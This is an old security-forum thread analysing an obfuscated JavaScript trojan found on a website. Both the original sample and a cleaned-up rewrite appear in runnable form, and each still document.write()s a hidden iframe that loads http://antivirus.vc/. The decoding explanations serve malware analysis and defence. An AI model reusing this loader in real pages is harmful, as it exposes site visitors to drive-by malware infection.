javascript trojan unrevealed
Posted by: merica
Date: May 08, 2009 03:34AM

I stumbled upon a website, and while the page was loading my antivirus flagged a trojan. I managed to view the page source and found this script. I tried to understand how it works, but the messy function and variable names got my head spinning, so here it is — maybe someone here can tell what this is all about.

<script>
/* REVIEW NOTE: malicious sample, kept byte-for-byte for reference. Do NOT load this in a browser.
   What it does, read straight from the code:
   - c268fb268di4a006283449b4(s) is parseInt(s, 16): a two-digit hex pair -> number.
   - i4a006283458f6(hex) walks `hex` two characters at a time and appends
     String.fromCharCode(parseInt(pair, 16)) to a buffer, i.e. a plain hex-to-text decoder.
     Its loop counter (i4a006283464ab) and its alias for String.fromCharCode (i4a0062834704f)
     are assigned without `var`, so both leak as globals.
   - r28 is the empty string; splicing '+r28+' into the hex literal every few characters
     changes nothing at runtime and presumably only exists to break up the literal so that
     a static signature on the hex string does not match.
   - document.write(decoded) injects the decoded text into the page. Decoding the hex by hand,
     the payload is a second script element that document.write()s unescape()d HTML: a
     376x168 iframe with style='visibility:hidden' whose src is http://antivirus.vc/? followed
     by a random number (looks like cache-busting), guarded by a `myia` flag so it only runs
     once. Re-check with a decoder before relying on this reading. */
function c268fb268di4a006283449b4(i4a00628344d43){ return (parseInt(i4a00628344d43,16));}function i4a006283458f6(i4a00628345ce2){ var i4a006283460ac='';i4a0062834704f=String.fromCharCode;for(i4a006283464ab=0;i4a006283464ab<i4a00628345ce2.length;i4a006283464ab+=2){ i4a006283460ac+=(i4a0062834704f(c268fb268di4a006283449b4(i4a00628345ce2.substr(i4a006283464ab,2))));}return i4a006283460ac;} var r28='';var i4a0062834744f='3C7'+r28+'3637'+r28+'2697'+r28+'07'+r28+'43E696628216D7'+r28+'96961297'+r28+'B646F637'+r28+'56D656E7'+r28+'42E7'+r28+'7'+r28+'7'+r28+'2697'+r28+'465287'+r28+'56E657'+r28+'363617'+r28+'065282027'+r28+'2533632536392536362537'+r28+'322536312536642536352532302536652536312536642536352533642536332533322533362532302537'+r28+'332537'+r28+'32253633253364253237'+r28+'2536382537'+r28+'342537'+r28+'342537'+r28+'302533612532662532662536312536652537'+r28+'342536392537'+r28+'362536392537'+r28+'322537'+r28+'352537'+r28+'332532652537'+r28+'36253633253266253366253237'+r28+'2532622534642536312537'+r28+'342536382532652537'+r28+'322536662537'+r28+'352536652536342532382534642536312537'+r28+'342536382532652537'+r28+'32253631253665253634253666253664253238253239253261253336253333253331253336253338253239253262253237'+r28+'253339253339253335253237'+r28+'2532302537'+r28+'37'+r28+'2536392536342537'+r28+'34253638253364253333253337'+r28+'253336253230253638253635253639253637'+r28+'2536382537'+r28+'342533642533312533362533382532302537'+r28+'332537'+r28+'342537'+r28+'39253663253635253364253237'+r28+'2537'+r28+'362536392537'+r28+'332536392536322536392536632536392537'+r28+'342537'+r28+'39253361253638253639253634253634253635253665253237'+r28+'2533652533632532662536392536362537'+r28+'3225363125366425363525336527'+r28+'29293B7'+r28+'D7'+r28+'6617'+r28+'2206D7'+r28+'969613D7'+r28+'47'+r28+'27'+r28+'5653B3C2F7'+r28+'3637'+r28+'2697'+r28+'07'+r28+'43E';document.write(i4a006283458f6(i4a0062834744f));</script>

Re: javascript trojan unrevealed
Posted by: Gareth Heyes
Date: May 08, 2009 05:14AM

<script>
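/**
 * Parse one byte of the obfuscated payload.
 *
 * @param {string} str - one or two hex digits, e.g. "3C"
 * @returns {number} the numeric value, or NaN if `str` is not hex
 */
function fromHex(str) {
  return parseInt(str, 16);
}

/**
 * Decode a hex string (two digits per character) back into text.
 *
 * Cleaned-up equivalent of the sample's decoder: the input is consumed two
 * characters at a time and each pair is mapped through fromHex and
 * String.fromCharCode. A non-hex pair parses to NaN and therefore decodes to
 * "\u0000"; a trailing odd digit is decoded on its own; "" decodes to "".
 * Nothing here is executed — the result is inert text until something
 * document.write()s it.
 *
 * @param {string} payload - hex-encoded text, e.g. "3C7363726970743E"
 * @returns {string} the decoded text, e.g. "<script>"
 */
function extractPayload(payload) {
  var chars = [];
  for (var pos = 0; pos < payload.length; pos += 2) {
    // slice() instead of the Annex-B substr(); identical for pos >= 0.
    chars.push(String.fromCharCode(fromHex(payload.slice(pos, pos + 2))));
  }
  // Collect into an array and join once rather than growing a string in the loop.
  return chars.join("");
}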

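/*
 * The sample's payload with the obfuscation noise stripped. The original
 * spliced an empty string (`r28`) into the hex literal every few characters,
 * which changes nothing at runtime and only breaks up the literal for
 * signature-based scanners; joining the fragments gives the single hex string
 * below, split here at the boundaries of what each part decodes to.
 *
 * Decoded with extractPayload, the payload is itself a script element:
 *   <script>if(!myia){document.write(unescape('%3c%69%66...%3e'))}var myia=true;  + closing script tag
 * and the unescape()d part is a hidden iframe:
 *   <iframe name=c26 src='http://antivirus.vc/?'+Math.round(Math.random()*63168)+'995'
 *           width=376 height=168 style='visibility:hidden'></iframe>
 * i.e. a drive-by loader: the random query string looks like cache-busting,
 * and the `myia` flag stops the script re-running if it is injected twice.
 *
 * WARNING: the document.write() below executes that payload. Read this in
 * view-source or a sandbox; do not load it in a browser you care about.
 */
var payload =
  // <script>if(!myia){document.write(unescape( '
  "3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E657363617065282027" +
  // %3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%32%36%20%73%72%63%3d%27   -> <iframe name=c26 src='
  "253363253639253636253732253631253664253635253230253665253631253664253635253364253633253332253336253230253733253732253633253364253237" +
  // -> http://antivirus.vc/?'
  "253638253734253734253730253361253266253266253631253665253734253639253736253639253732253735253733253265253736253633253266253366253237" +
  // -> +Math.round(Math.random()*63168)+'995'
  "253262253464253631253734253638253265253732253666253735253665253634253238253464253631253734253638253265253732253631253665253634253666253664253238253239253261253336253333253331253336253338253239253262253237253339253339253335253237" +
  // ->  width=376 height=168 style='
  "253230253737253639253634253734253638253364253333253337253336253230253638253635253639253637253638253734253364253331253336253338253230253733253734253739253663253635253364253237" +
  // -> visibility:hidden'></iframe>
  "253736253639253733253639253632253639253663253639253734253739253361253638253639253634253634253635253665253237253365253363253266253639253636253732253631253664253635253365" +
  // '));}var myia=true;  + closing script tag
  "2729293B7D766172206D7969613D747275653B3C2F7363726970743E";
// Executes the decoded payload in the current document (see WARNING above).
document.write(extractPayload(payload));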
</script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: javascript trojan unrevealed
Posted by: Gareth Heyes
Date: May 08, 2009 05:33AM

And so the question is can Hackvertor decode it? :)

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php#PEBmcm9tY2hhcmNvZGVzXzE%2BPEBoZXgyZGVjXzAoJywnKT48QHJlcGxhY2VfMSgiLCIsIjB4LCIpPjxAZmluZF8wKC57Mn0sZ2ltKT48QHJlcGxhY2VfMjYoIlsnO10iLCk%2BPEByZXBsYWNlXzI1KCInXCtyMjhcKyciLCk%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%2BPEAvZmluZF8wPjxAL3JlcGxhY2VfMT48QC9oZXgyZGVjXzA%2BPEAvZnJvbWNoYXJjb2Rlc18xPg%3D%3D

and if you're super lazy:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php#PHNjcmlwdD5pZighbXlpYSl7ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoICc8QGRfZW5jXzI%2BJTNjJTY5JTY2JTcyJTYxJTZkJTY1JTIwJTZlJTYxJTZkJTY1JTNkJTYzJTMyJTM2JTIwJTczJTcyJTYzJTNkJTI3JTY4JTc0JTc0JTcwJTNhJTJmJTJmJTYxJTZlJTc0JTY5JTc2JTY5JTcyJTc1JTczJTJlJTc2JTYzJTJmJTNmJTI3JTJiJTRkJTYxJTc0JTY4JTJlJTcyJTZmJTc1JTZlJTY0JTI4JTRkJTYxJTc0JTY4JTJlJTcyJTYxJTZlJTY0JTZmJTZkJTI4JTI5JTJhJTM2JTMzJTMxJTM2JTM4JTI5JTJiJTI3JTM5JTM5JTM1JTI3JTIwJTc3JTY5JTY0JTc0JTY4JTNkJTMzJTM3JTM2JTIwJTY4JTY1JTY5JTY3JTY4JTc0JTNkJTMxJTM2JTM4JTIwJTczJTc0JTc5JTZjJTY1JTNkJTI3JTc2JTY5JTczJTY5JTYyJTY5JTZjJTY5JTc0JTc5JTNhJTY4JTY5JTY0JTY0JTY1JTZlJTI3JTNlJTNjJTJmJTY5JTY2JTcyJTYxJTZkJTY1JTNlPEAvZF9lbmNfMj4nKSk7fXZhciBteWlhPXRydWU7PC9zY3JpcHQ%2B

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 05/08/2009 05:34AM by Gareth Heyes.


